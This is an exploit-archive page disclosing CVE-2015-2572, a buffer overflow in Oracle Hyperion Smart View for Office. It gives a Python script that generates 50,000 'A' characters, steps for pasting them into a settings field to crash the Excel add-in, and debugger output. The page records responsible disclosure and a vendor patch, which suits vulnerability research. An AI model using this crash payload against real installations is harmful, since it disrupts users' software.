what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Oracle Hyperion Smart View For Office 11.1.2.3.000 DoS

Oracle Hyperion Smart View For Office 11.1.2.3.000 DoS
Posted Apr 17, 2015
Authored by sajith

Oracle Hyperion Smart View for Office version 11.1.2.3.000 crash proof of concept exploit.

tags | exploit, denial of service, proof of concept
advisories | CVE-2015-2572
SHA-256 | bb69d53198e80e76ff0eca4eb90e217e462a2cec929d7d3170521851e6381dee

Oracle Hyperion Smart View For Office 11.1.2.3.000 DoS

Change Mirror Download
# Exploit Title: Buffer Overflow in Oracle� Hyperion Smart View for Office [DOS]
# Exploit Author: sajith
# Vendor Homepage: http://oracle.com
# vulnerable Version: Fusion Edition 11.1.2.3.000 Build 157
#Vulnerable Link: http://www.oracle.com/technetwork/middleware/smart-view-for-office/downloads/index.html
# Tested in: Microsoft Windows 7 Enterprise 6.1.7601 Service Pack 1 [x64],en-us
#plugin tested with Microsoft Excel 2010
#CVE: CVE-2015-2572

Responsible Disclosure:

Reported to Oracle on Jul 7, 2014
patch released on April 14, 2015

How to reproduce the bug?


1)install "Smart view" and open Microsoft excel and click on "smart view"
tab

2)click on "Options" and then click on "Advanced" tab

3) In General menu in "shared Connections URL" enter large value say 50000
"A"'s and press ok, the application crashes, the output of the crash
analyzed in debugger is shown below

Note:Plugin once installed automatically integrates with Microsoft office
products like,excel,Word,PowerPoint,Microsoft office.so the vulnerability
can be exploited via any of these products.

==================python script to create 50000 "A"'s============


try:

print "POC by sajith shetty"

f = open("text.txt","w")

junk = "A" * 50000

f.write(junk)

print "done"

except Exception, e:

print "error- " + str(e)


Debugger o/p:

eax=00410061 ebx=0041005d ecx=00410041 edx=00000000 esi=00410061
edi=0041005d
eip=779622d2 esp=0040b7f8 ebp=0040b80c iopl=0 nv up ei pl nz na pe
nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
efl=00010206
ntdll!RtlEnterCriticalSection+0x12:
779622d2 f00fba3000 lock btr dword ptr [eax],0
ds:002b:00410061=????????

caused by MODULE_NAME: HsAddin


start end module name
0fb50000 111a0000 HsAddin (export symbols)
C:\Oracle\SmartView\bin\HsAddin.dll
Loaded symbol image file: C:\Oracle\SmartView\bin\HsAddin.dll
Image path: C:\Oracle\SmartView\bin\HsAddin.dll
Image name: HsAddin.dll
Timestamp: Wed Mar 27 04:27:50 2013 (515227EE)
CheckSum: 0163F951
ImageSize: 01650000
File version: 11.1.2.3085
Product version: 11.1.2.3085
File flags: 0 (Mask 3F)
File OS: 4 Unknown Win32
File type: 2.0 Dll
File date: 00000000.00000000
Translations: 0409.04b0
CompanyName: Oracle Corporation
ProductName: Oracle� Hyperion Smart View for Office, Fusion Edition
InternalName: CommonAddin
ProductVersion: 11.1.2.3.000.157
FileVersion: 11.1.2.3085
FileDescription: Oracle� Hyperion Smart View for Office, Fusion Edition
LegalCopyright: Copyright 2004, 2013 Oracle Corporation. All rights
reserved
LegalTrademarks: Oracle� is registered.

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close